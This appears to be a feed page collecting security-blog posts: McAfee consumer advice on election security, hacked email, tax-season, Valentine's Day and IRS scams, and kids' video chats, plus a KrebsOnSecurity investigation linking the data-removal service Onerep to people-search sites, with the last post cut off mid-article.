Login
As election season approaches, the importance of safeguarding our democratic processes has never been more critical. Ensuring election security is not just the responsibility of government bodies but also of every individual voter. This blog post aims to provide valuable insights and practical tips for consumers to protect their votes and understand the mechanisms in place to secure elections.
Election security encompasses a broad range of practices designed to ensure the integrity, confidentiality, and accessibility of the voting process. This includes safeguarding against cyber threats, ensuring the accuracy of voter registration databases, protecting the physical security of voting equipment, and maintaining transparency in the vote counting process. As voters, being aware of these elements helps us appreciate the complexity and importance of secure elections.
One of the first steps to secure your vote is to ensure that you are registered correctly. Check your voter registration status well in advance of the election day through your local election office or official state website. This helps to avoid any last-minute issues and ensures your eligibility to vote.
Misinformation can spread rapidly, especially during election periods. Rely on official sources for information about polling locations, voting procedures, and deadlines. Avoid sharing unverified information on social media and report any suspicious content to the relevant authorities.
Whether you are voting in person or by mail, make sure to follow the recommended procedures. If voting by mail, request your ballot from a verified source and return it through secure methods such as official drop boxes or by mail with sufficient time to ensure it is received before the deadline.
Scammers often target voters to steal personal information. Be cautious of unsolicited phone calls, emails, or texts asking for your personal details. Official election offices will not request sensitive information such as your Social Security number via these methods.
If you notice anything unusual at your polling place or have concerns about the voting process, report it immediately to election officials. This includes any signs of tampering with voting machines, suspicious behavior, or attempts to intimidate voters.
Familiarize yourself with the voting process in your area. This includes knowing your polling location, understanding what identification is required, and learning about the different ways you can cast your vote. Many states provide detailed guides and resources for first-time voters.
Plan your voting day in advance. Decide whether you will vote in person or by mail, and make sure you have all necessary documentation ready. If you are voting in person, consider going during off-peak hours to avoid long lines.
Before you head to the polls, research the candidates and issues on the ballot. This will help you make informed decisions and feel more confident in your choices.
Don’t hesitate to ask for help if you need it. Election officials and poll workers are there to assist you. Additionally, many organizations offer support for first-time voters, including transportation to polling places and information hotlines.
Understand the security measures your state has implemented to protect the election process. This might include the use of paper ballots, post-election audits, and cybersecurity protocols. Being aware of these measures can increase your confidence in the election’s integrity.
If your state offers early voting, take advantage of it. Early voting can reduce the stress of long lines and crowded polling places on election day, making the process smoother and more secure.
Encourage friends and family to vote and educate them about election security. A well-informed electorate is a key component of a secure and fair election.
Keep up with reputable news sources to stay informed about any potential security threats or changes in the voting process. This will help you stay prepared and responsive to any issues that might arise.
By following these tips and staying vigilant, every voter can contribute to a secure and fair election process. Remember, your vote is your voice, and protecting it is essential for the health of our democracy. Happy voting!
The post What You Need to Know About Election Security appeared first on McAfee Blog.
I think I could count on my hand the people I know who have NOT had their email hacked. Maybe they found a four-leaf clover when they were kids!
Email hacking is one of the very unfortunate downsides of living in our connected, digital world. And it usually occurs as a result of a data breach – a situation that even the savviest tech experts find themselves in.
In simple terms, a data breach happens when personal information is accessed, disclosed without permission, or lost. Companies, organisations, and government departments of any size can be affected. Data stolen can include customer login details (email addresses and passwords), credit card numbers, identifying IDs of customers e.g. driver’s license numbers and/or passport numbers, confidential customer information, company strategy, or even matters of national security.
Data breaches have made headlines, particularly over the last few years. When the Optus and Medibank data breaches hit the news in 2022 affecting almost 10 million Aussies a piece, we were all shaken. But then when Aussie finance company Latitude, was affected in 2023 with a whopping 14 million people from both Australia and New Zealand affected, it almost felt inevitable that by now, most of us would have been impacted.
But these were the data breaches that grabbed our attention. The reality is that data breaches have been happening for years. In fact, the largest data breach in Australian history actually happened in May 2019 to the online design site Canva which affected 137 million users globally including many Aussies.
So, in short – it can happen to anyone, and the chances are you may have already been affected.
The sole objective of a hacker is to get their hands on your data. And any information that you share in your email account can be very valuable to them. But why do they want your data, you ask? It’s simple really – so they can cash in! Some will keep the juicy stuff for themselves – passwords or logins to government departments or large companies they may want to ’target’ with the aim of extracting valuable data and/or funds. But the more sophisticated ones will sell your details including name, telephone, email address, and credit card details, and cash in on the Dark Web. They often do this in batches. Some experts believe they can get as much as AU$250 for a full set of details including credit cards. So, you can see why they’d be interested in you!
The other reason why hackers will be interested in your email address and password is that many of us re-use these login details across our other online accounts too. So, once they’ve got their hands on your email credentials then they may be able to access your online banking and investment accounts – the possibilities are endless if you are using the same login credentials everywhere. So, you can see why I harp on about using a unique password for every online account!
There is a plethora of statistics on just how big this issue is – all of them concerning.
According to the Australian Institute of Criminology, there were over 16,000 reports of identity theft in 2022.
The Department of Home Affairs and Stay Smart Australia reports that cybercrime costs Australian businesses $29 billion a year with the average business spending around $275,000 to remedy a data breach
And although there has been a slight reduction in Aussies falling for phishing scams in recent years (down from 2.7% in 2020/1 to 2.5% in 2022/3), more Australians are falling victim to card fraud scams with a total of $2.2 billion lost in 2023.
But regardless of which statistic you choose to focus on, we have a big issue on our hands!
If you find yourself a victim of email hacking there are a few very important steps you need to take and the key is to take them FAST!!
This is the very first thing you must do to ensure the hacker can’t get back into your account. It is essential that your new password is complex and totally unrelated to previous passwords. Always use at least 8-10 characters with a variety of upper and lower case and throw in some symbols and numbers. I really like the idea of a crazy, nonsensical sentence – easier to remember and harder to crack! But, better still, get yourself a password manager that will create a password that no human would be capable of creating.
If you find the hacker has locked you out of your account by changing your password, you will need to reset the password by clicking on the ‘Forgot My Password’ link.
This is time-consuming but essential. Ensure you change any other accounts that use the same username and password as your compromised email. Hackers love the fact that many people still use the same logins for multiple accounts, so it is guaranteed they will try your info in other email applications and sites such as PayPal, Amazon, Netflix – you name it!
Once the dust has settled, please review your password strategy for all your online accounts. A best practice is to ensure every online account has its own unique and complex password.
A big part of the hacker’s strategy is to ‘get their claws’ into your address book with the aim of hooking others as well. Send a message to all your email contacts as soon as possible so they know to avoid opening any emails (most likely loaded with malware) that have come from you.
Yes, multi-factor authentication (or 2-factor authentication) adds another step to your login but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a special one-time use code to log in. This can be sent to your mobile phone or alternatively, it may be generated via an authenticator app. So worthwhile!
It is not uncommon for hackers to modify your email settings so that a copy of every email you receive is automatically forwarded to them. Not only can they monitor your logins for other sites, but they’ll keep a watchful eye over any particularly juicy personal information. So, check your mail forwarding settings to ensure no unexpected email addresses have been added.
Don’t forget to check your email signature to ensure nothing spammy has been added. Also, ensure your ‘reply to’ email address is actually yours! Hackers have been known to create an email address here that looks similar to yours – when someone replies, it goes straight to their account, not yours!
This is essential also. If you find anything, please ensure it is addressed, and then change your email password again. And if you don’t have it – please invest. Comprehensive security software will provide you with a digital shield for your online life. McAfee+ lets you protect all your devices – including your smartphone – from viruses and malware. It also contains a password manager to help you remember and generate unique passwords for all your accounts.
If you have been hacked several times and your email provider isn’t mitigating the amount of spam you are receiving, then consider starting afresh but don’t delete your email address. Many experts warn against deleting email accounts as most email providers will recycle your old email address. This could mean a hacker could spam every site they can find with a ‘forgot my password’ request and try to impersonate you – identity theft!
Your email is an important part of your online identity so being vigilant and addressing any fallout from hacking is essential for your digital reputation. And even though it may feel that ‘getting hacked’ is inevitable, you can definitely reduce your risk by installing some good quality security software on all your devices. Comprehensive security software such as McAfee+ will alert you when visiting risky websites, warn you when a download looks ‘dodgy’, and will block annoying and dangerous emails with anti-spam technology.
It makes sense really – if you don’t receive the ‘dodgy’ phishing email – you can’t click on it! Smart!
And finally, don’t forget that hackers love social media – particularly those of us who overshare on it. So, before you post details of your adorable new kitten, remember it may just provide the perfect clue for a hacker trying to guess your email password!
Till next time
Alex
The post What to Do If Your Email Is Hacked appeared first on McAfee Blog.
Cisco XDR is a leader in providing comprehensive threat detection and response across the entire attack surface. We’ll be showcasing new capabilities that will give security teams even more insight, a… Read more on Cisco Blogs
It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.
So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.
In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.
Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.
Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:
File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.
Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.
Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.
Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blog.
As taxpayers prepare their returns for April 15th, scammers prepare too. They see tax season as high time to run all kinds of scams and identity theft schemes.
Fake accountants, fake tax software, robocalls, and more all make the list. We’ll give you a look at what’s happening out there right now. And we’ll run down several ways you can keep safe.
A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or government bureaus. This tactic is pretty effective due to Americans’ concerns about misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.
Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail mail or in person, not over the phone.
Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.
Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but won’t sign the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned or apply changes that will get them in trouble. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.
While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:
File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.
Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Remember: the IRS will not initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info. So someone contacts you that way, ignore the message.
Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.
Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.
Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blog.
Join the guided tour outside the Security Operations Center, where we’ll discuss real time network traffic of the RSA Conference, as seen in the NetWitness platform. Engineers will be using Cisco S… Read more on Cisco Blogs
The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.
Onerep’s “Protect” service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.
A testimonial on onerep.com.
Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.
But a review of Onerep’s domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest’s profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.
A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.
Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com’s website disavows any relationship to Nuwber.com, stating quite clearly, “Please note that OneRep is not associated with Nuwber.com.”
However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com’s domain registration records in 2018 list the email address dmitrcox2@gmail.com.
It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a “2” to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.
Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.
A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.
Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).
Nuwber.com, circa 2015. Image: Archive.org.
Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was “zero cross-over or information-sharing with OneRep.” Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.
“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.” The full statement is available here (PDF).
Original story:
Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.
Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.
“Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives’ names and address histories,” Privacyduck.com wrote. The post continued:
“Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).”
“Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).”
Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name “Dzmitry.”
PrivacyDuck’s claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.
Still, Mr. Shelest’s name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.
The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.
The German people-search site waatp.de.
A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.
Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest’s email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).
That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelest’s Facebook account is no longer active].
The Italian people-search website peeepl.it.
Scrolling down Mr. Shelest’s Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).
The people-search website popopke.com.
Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.
Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder’s many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: “We believe that no one should compromise personal online security and get a profit from it.”
The people-search website findmedo.com.
Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients’ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between between a data removal service and data broker websites.
“I would consider it unethical to run a company that sells people’s information, and then charge those same people to have their information removed,” Anderson said.
Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.
That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders’ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.
KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.
Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.
“The free data breach notification service is a partnership with Have I Been Pwned (“HIBP”),” the Mozilla Foundation explains. “The automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals (“Data Broker Sites”).”
In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRep’s data removal service to confirm it acts according to privacy principles advocated at Mozilla.
“We were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together,” the statement reads. “We’re now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed.”
Article tags
As with any major holiday or special occasion, Valentine’s Day is unfortunately not immune to scammers looking for an opportunity to exploit unsuspecting individuals. Their deceitful acts can break hearts and bank accounts. In this article, we spotlight some common Valentine’s Day scams, offer tips on how to protect yourself and navigate this romantic day with confidence and caution.
Valentine’s Day is a time when love is in the air. It’s a time to express your feelings for that special someone in your life, or perhaps even embark on a new romantic journey. But while you’re busy planning that perfect dinner or choosing the ideal gift, there’s an unromantic side to the day that you should be aware of – the potential for scams.
Scammers, always looking for new ways to trick people into parting with their money, use the heightened emotions of Valentine’s Day to their advantage. They prey on the unwary, the love-struck, and even the lonely – anyone who might let their guard down in the quest for love or the pursuit of the perfect gift. And in our increasingly digital world, these unscrupulous individuals have more ways than ever to reach potential victims.
→ Dig Deeper: AI Goes Dating: McAfee Study Shows 1 in 3 Men Plan to Use Artificial Intelligence to Write Love Letters this Valentine’s Day
Knowledge is power, as the saying goes, and that’s certainly true when it comes to protecting yourself from scams. By understanding the types of scams that are common around Valentine’s Day, you can be better prepared to spot them – and avoid falling victim.
One of the most common Valentine’s Day scams is the romance scam. Scammers, often posing as potential love interests on dating websites or social media, manipulate victims into believing they are in a romantic relationship. Once they have gained their victim’s trust, they ask for money – perhaps to pay for a flight so they can meet in person, or because of a sudden personal crisis. These scams can be emotionally devastating, and they can also result in significant financial loss.
→ Dig Deeper: Fraudulent Adult Dating Services Turn 10 Years Old, Still Evolving
Another popular scam around Valentine’s Day involves online shopping. With many people seeking the perfect gift for their loved ones, scammers set up fake websites that appear to sell everything from jewelry to concert tickets. After making a purchase, the unsuspecting victim either receives a counterfeit product or, in some cases, nothing at all. Additionally, these sites may be designed to steal credit card information or other personal data.
Phishing scams are also common. In these scams, victims receive emails that appear to be from a legitimate company – perhaps a florist or a candy company – asking them to confirm their account information or to click on a link. The goal is to steal sensitive information, such as credit card numbers or login credentials.
While the existence of these scams is unquestionably concerning, the good news is that there are steps you can take to protect yourself. Valentine’s Day should be a celebration of love, not a source of stress and worry.
One of the most important is to be aware that these scams exist and to be cautious when interacting with unfamiliar people or websites. If something seems too good to be true, it probably is.
When shopping online, make sure the website you are using is secure, and consider using a credit card, which offers greater protection against fraud compared to other forms of payment. Be wary of emails from unknown sources, especially those that ask for personal information or urge you to click on a link.
For shopping scams, it’s recommended to do research on any unfamiliar online retailer before making a purchase. Look for reviews or complaints about the retailer on independent consumer websites. If the website is offering items at a price that seems too good to be true, it likely is. Also, consider the website’s URL. A URL that begins with ‘https://’ indicates that the website encrypts user information, making it safer to input sensitive information than on websites with ‘http://’ URLs.
Forewarned is forearmed, and having advanced strategies to detect and avoid scams is also a strong line of defense. When it comes to online dating, be sure to thoroughly vet any potential romantic interests. This involves doing a reverse image search of profile photos, which can quickly reveal if a picture has been stolen from another online source. Additionally, be aware of red flags such as overly-flattering messages or requests to move the conversation to a private email or messaging app.
McAfee Pro Tip: If you’re considering using one of these for a bit of dating beyond a dating app or simply to stay connected with family and friends, the key advice is to do your homework. Look into their security measures and privacy policies, especially because some have faced security issues recently. For more information, take a look at this article on video conferencing to ensure you can keep hackers and uninvited guests away when you’re chatting.
If you come across a scam or fall victim to one, it’s crucial to report it to the appropriate authorities. This helps law enforcement track down scammers and alert others to the scam. In the U.S., you can report scams to the Federal Trade Commission through their website. If the scam involves a financial transaction, also report it to your bank or credit card company. They may be able to help recover your funds or prevent further losses.
Additionally, take steps to protect yourself after falling victim to a scam. This could involve changing passwords, monitoring your financial accounts for unusual activity, or even freezing your credit. It can also be beneficial to alert your friends and family to the scam, both to protect them and to gain their support and assistance in dealing with the aftermath of the scam.
→ Dig Deeper: How To Report An Online Scam
The unfortunate reality is that scammers are ever-present and always looking for new ways to exploit unsuspecting victims. However, by being informed, cautious, and proactive, you can significantly decrease your chances of falling victim to a Valentine’s Day scam. Whether you’re looking for love or shopping for the perfect gift, remember to always prioritize your safety and security.
And if you do encounter a scam, take comfort in knowing that you’re not alone and there are resources available to help. McAfee’s blogs and reports are just some of them. By reporting scams to the authorities, you’re doing your part to help stop scammers in their tracks and protect others from falling victim. Remember, Valentine’s Day is a day for celebrating love, not for worrying about scammers. Stay safe, stay informed, and don’t let a scammer ruin your Valentine’s Day.
Remember to always stay vigilant. Protect your heart and your bank account, and make sure your Valentine’s Day is filled with love and happiness, not regret and frustration. Don’t let scammers break your heart or your bank account – on Valentine’s Day or on any other day.
The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blog.
Given the climate surrounding COVID-19, many of us have had to substitute in-person social interactions with virtual communication. For parents, this includes organizing virtual playdates, hangouts, and video chats for their kids. While this provides an excellent solution for children to continue interacting with their peers, it has also opened up a new avenue for potential risks and dangers. It is imperative to ensure these virtual platforms are safe for all involved. In this article, we will provide some essential strategies for maintaining a secure and enjoyable online social environment for everyone.
The advent of technology has significantly transformed the way we communicate and interact with each other. However, as with any great invention, it also comes with potential risks and dangers, especially for kids who may not fully comprehend the implications of their online activities. With cyberbullying, online predators, and inappropriate content being just a few of the digital risks, it is crucial to establish robust safety measures when kids engage in online social activities such as virtual playdates, hangouts, and video chats.
In this article, we will explore the different ways parents and caregivers can keep these activities secure and fun. By understanding the risks involved, staying informed on the latest developments in online safety, and taking actionable steps, everyone can navigate the digital world safely and confidently.
Navigating the potential pitfalls of online interaction requires proactive measures and informed strategies. Let’s take a look at these tips on how to safeguard everyone from the inherent dangers of virtual communication, promoting a secure and positive digital experience for all.
The first step in ensuring a safe online environment for children is understanding the potential risks and how they can be mitigated. Internet safety is not just about blocking and filtering inappropriate content; it’s also about educating ourselves and our children on how to behave responsibly online and understanding the potential repercussions of our digital footprint.
Online activities, especially those involving video chats, can expose children to various risks, including cyberbullying, identity theft, and exposure to inappropriate content. These risks can have devastating consequences on a child’s mental health, self-esteem, and overall well-being. As such, it is vital for parents and caregivers to have regular conversations about these potential dangers with their children. It’s also crucial to ensure that children feel comfortable expressing any concerns or reporting any uncomfortable situations they encounter online.
→ Dig Deeper: Messenger Rooms: New Video Chat Option is Fun But Has Risks
The market is flooded with countless communication platforms, each with its features, safety measures, and potential loopholes. As a parent, choosing the right tool for your child’s online activities can be quite overwhelming. Not all platforms are created equal, and while some prioritize user safety and provide robust parental controls, others may not provide the same level of security.
